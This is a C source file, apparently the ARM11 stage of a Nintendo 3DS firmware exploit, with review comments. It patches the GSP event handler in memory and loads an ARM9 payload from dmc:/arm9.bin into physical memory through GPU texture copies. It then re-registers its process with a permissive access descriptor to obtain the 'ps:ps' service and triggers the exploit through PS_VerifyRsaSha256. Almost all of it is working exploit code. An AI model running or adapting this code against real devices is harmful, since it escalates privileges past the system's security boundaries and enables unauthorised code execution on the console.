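/*
 * Return a handle to the current process, opening it on first use and caching
 * it in the global hCurrentProcess for later calls.
 *
 * 0xffff8001 is passed to svc_getProcessId as the current-process
 * pseudo-handle; the resulting PID is stored in the global currentPid and then
 * opened for real with svc_openProcess.
 *
 * Returns the process handle, or 0 if either the PID lookup or svc_openProcess
 * fails (the failing result code is reported through showDbg). Nothing is
 * cached on failure, so a later call retries from scratch.
 *
 * NOTE(review): this assumes svc_getProcessId reports failure with a non-zero
 * result like svc_openProcess does -- confirm against its declaration.
 */
u32 getCurrentProcessHandle()
{
    if (hCurrentProcess != 0) {
        return hCurrentProcess;
    }

    u32 ret = svc_getProcessId(&currentPid, 0xffff8001);
    if (ret != 0) {
        showDbg("getProcessId failed, ret: %08x", ret, 0);
        return 0;
    }

    u32 handle = 0;
    ret = svc_openProcess(&handle, currentPid);
    if (ret != 0) {
        showDbg("openProcess failed, ret: %08x", ret, 0);
        return 0;
    }

    hCurrentProcess = handle;
    return hCurrentProcess;
}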
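/*
 * ARM11 entry point of the exploit stage (placed in the .text.a11.entry section).
 *
 * Sequence, as written here:
 *   1. read back the GSP framebuffer registers into regs[] so the ARM9 payload
 *      can locate the framebuffers,
 *   2. patch the gsp event-handler slot so the gsp thread is killed ASAP,
 *   3. stream dmc:/arm9.bin (at most 0x20000 bytes, in 0x10000-byte blocks)
 *      through the staging buffer into 0x17F00000 with GX texture copies,
 *   4. leave MAGIC_WORD twice plus the selected framebuffer addresses at the
 *      start of the staging buffer for the ARM9 payload to find,
 *   5. re-register this process with the permissive access descriptor
 *      access_bin, fetch a "ps:ps" handle and trigger the exploit through
 *      PS_VerifyRsaSha256, which is not expected to return.
 *
 * Returns 0 if a preparatory step fails (reported through showDbg, exploit not
 * triggered) or if the exploit call unexpectedly returns.
 *
 * NOTE(review): the IFile_* checks below assume the 3DS convention that a
 * zero result means success (the same convention svc_openProcess uses in this
 * file) -- confirm against the IFile declarations.
 */
int __attribute__ ((section (".text.a11.entry"))) _main()
{
    /* Indices into regs[]: two sentinel words followed by the values read from
     * the GSP hardware registers below (an 8-byte read fills two entries). */
    enum {
        REG_MARKER0 = 0,
        REG_MARKER1 = 1,
        REG_FB1_TOP_LEFT = 2,    /* 0x400468 */
        REG_FB2_TOP_LEFT = 3,
        REG_FB1_TOP_RIGHT = 4,   /* 0x400494 */
        REG_FB2_TOP_RIGHT = 5,
        REG_FB1_BOTTOM = 6,      /* 0x400568 */
        REG_FB2_BOTTOM = 7,
        REG_TOP_SELECT = 8,      /* 0x400478 */
        REG_BOTTOM_SELECT = 9,   /* 0x400578 */
        REG_COUNT = 10
    };
    uint32_t regs[REG_COUNT];

    svc_sleepThread(0x10000000);

    // Get framebuffer addresses
    regs[REG_MARKER0] = 0xDEADBABE;
    regs[REG_MARKER1] = 0xBABEDADA;
    //FIXME where do these reg addresses come from?
    _GSPGPU_ReadHWRegs(gspHandle, 0x400468, &regs[REG_FB1_TOP_LEFT], 8);   // framebuffer 1 top left & framebuffer 2 top left
    _GSPGPU_ReadHWRegs(gspHandle, 0x400494, &regs[REG_FB1_TOP_RIGHT], 8);  // framebuffer 1 top right & framebuffer 2 top right
    _GSPGPU_ReadHWRegs(gspHandle, 0x400568, &regs[REG_FB1_BOTTOM], 8);     // framebuffer 1 bottom & framebuffer 2 bottom
    _GSPGPU_ReadHWRegs(gspHandle, 0x400478, &regs[REG_TOP_SELECT], 4);     // framebuffer select top
    _GSPGPU_ReadHWRegs(gspHandle, 0x400578, &regs[REG_BOTTOM_SELECT], 4);  // framebuffer select bottom

    //patch gsp event handler addr to kill gsp thread ASAP, PA 0x267CF418
    *((u32*)(0x003F8418+0x10+4*0x4))=0x002CA520; //svc 0x9 addr
    flashScreen();
    svc_sleepThread(0x10000000);

    // Read the main payload to 0x17F00000(0x23F00000 pa)
    // The staging buffer is work_buffer + 0x10000 (presumably 0x18410000, see the
    // marker comment below -- not verifiable from this file).
    u32 *buffer = (work_buffer + 0x10000 / sizeof(u32));
    IFILE file;
    _memset(&file, 0, sizeof(file));
    if (IFile_Open(&file, L"dmc:/arm9.bin", 1) != 0) {
        // Without the payload there is nothing sane to jump to after the exploit.
        showDbg("IFile_Open(dmc:/arm9.bin) failed", 0, 0);
        return 0;
    }

    const uint32_t block_size = 0x10000;
    for (u32 offset = 0; offset < 0x20000u; offset += block_size) {
        // Zeroed so a read that never stores the count cannot leave it uninitialized.
        unsigned int readBytes = 0;
        if (IFile_Read(&file, &readBytes, (void *)buffer, block_size) != 0) {
            showDbg("IFile_Read(dmc:/arm9.bin) failed", 0, 0);
            return 0;
        }
        GSPGPU_FlushDataCache(buffer, block_size);
        // NOTE(review): if GX_SetTextureCopy is asynchronous, the next iteration's
        // read into the same buffer could race with this copy -- confirm.
        GX_SetTextureCopy(buffer, (void *)(0x17F00000 + offset), block_size, 0, 0, 0, 0, 8);
        if (readBytes != block_size) {
            break;  // short read: the last, partial block has been copied
        }
    }

    // Copy the magic to 0x18410000
    // Copy it twice to make it easier to find and avoid catching the wrong one
    buffer[0] = MAGIC_WORD;
    buffer[1] = MAGIC_WORD;
    // A non-zero select register picks the "framebuffer 1" values, zero the
    // "framebuffer 2" values (which one is on screen is not checked here).
    if (regs[REG_TOP_SELECT]) {
        buffer[2] = regs[REG_FB1_TOP_LEFT];
        buffer[3] = regs[REG_FB1_TOP_RIGHT];
    } else {
        buffer[2] = regs[REG_FB2_TOP_LEFT];
        buffer[3] = regs[REG_FB2_TOP_RIGHT];
    }
    if (regs[REG_BOTTOM_SELECT]) {
        buffer[4] = regs[REG_FB1_BOTTOM];
    } else {
        buffer[4] = regs[REG_FB2_BOTTOM];
    }

    // Grab access to PS Handle port;
    // Re-register this process (pseudo-handle 0xFFFF8001) with access_bin so
    // the service manager grants the "ps:ps" service.
    svc_connectToPort(&port, "srv:pm");
    srv_RegisterClient(&port);
    u32 proc = 0;
    svc_getProcessId(&proc, 0xFFFF8001);
    srvUnregisterProcess(&port, proc);
    srvRegisterProcess(&port, proc, 0x18, (const void *)&access_bin[0]);
    Handle ps_handle = 0;
    srv_getServiceHandle(&port, &ps_handle, "ps:ps");
    if (ps_handle == 0) {
        // No handle was returned: the exploit call would only fail on a null handle.
        showDbg("failed to obtain ps:ps handle", 0, 0);
        return 0;
    }
    svc_sleepThread(0x10000000);

    // Perform the exploit
    PS_VerifyRsaSha256(&ps_handle);

    // We do not expect reaching here
    return 0;
}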
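/*
 * Look up the PID of the current process (pseudo-handle 0xffff8001) into the
 * global currentPid and return it.
 *
 * If svc_getProcessId fails, the failing result code is reported through
 * showDbg and the previous contents of currentPid are returned unchanged, so
 * callers cannot tell failure from success by the return value alone.
 *
 * NOTE(review): assumes svc_getProcessId returns a non-zero result on failure,
 * as svc_openProcess does elsewhere in this file -- confirm.
 */
u32 getCurrentProcessId()
{
    u32 ret = svc_getProcessId(&currentPid, 0xffff8001);
    if (ret != 0) {
        showDbg("getProcessId failed, ret: %08x", ret, 0);
    }
    return currentPid;
}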